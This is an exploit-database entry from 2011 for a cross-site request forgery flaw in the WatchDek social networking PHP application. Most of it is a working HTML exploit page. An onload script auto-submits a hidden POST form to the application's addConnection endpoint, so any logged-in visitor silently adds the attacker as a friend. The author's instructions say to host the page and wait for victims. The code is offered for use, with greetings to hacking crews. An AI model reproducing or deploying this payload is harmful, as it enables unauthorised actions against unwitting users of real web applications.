WatchDek Social Networking XSRF (Force Add attacker as Friend)

2011-04-10T00:00:00
ID 1337DAY-ID-15817
Type zdt
Reporter ^Xecuti0N3r
Modified 2011-04-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #(+) Exploit Title: WatchDek Social Networking XSRF Vulnerability (Force Add attacker as Friend)
#(+) Author   : ^Xecuti0n3r
#(+) E-mail  : xecutioner()yahoo.com
#(+) Category  : Web Apps [XSRF]
#(+) App website: watchdek.com

#All you have to do is save the below code as exploit.html
#Then Host a website with the exploit.html file. Any person who visits the website
# will see that he has automatically added the attacked on his friend list without warning ;) 
____________________________________________________________________
____________________________________________________________________
Code:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>WatchDek Force add attacker as Friend</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">


function fireForms()
{
    var count = 9;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
    }
}
    
</script>
<H2>WatchDek Force add attacker as Friend</H2>

<form method="POST" name="form5" action="http://localhost:80/index.php?option=com_comprofiler&act=connections&task=addConnection&connectionid=293">
<input type="hidden" name="message" value="Add me up Sir"/> 
</form>

</body>
</html>

########################################################################
(+)Exploit Coded by: ^Xecuti0N3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : -[SiLeNtp0is0n]- , 3thicaln00b, eXes0ul and all Friends at Indian Cyber Army & Indishell Crew
########################################################################



#  0day.today [2018-02-13]  #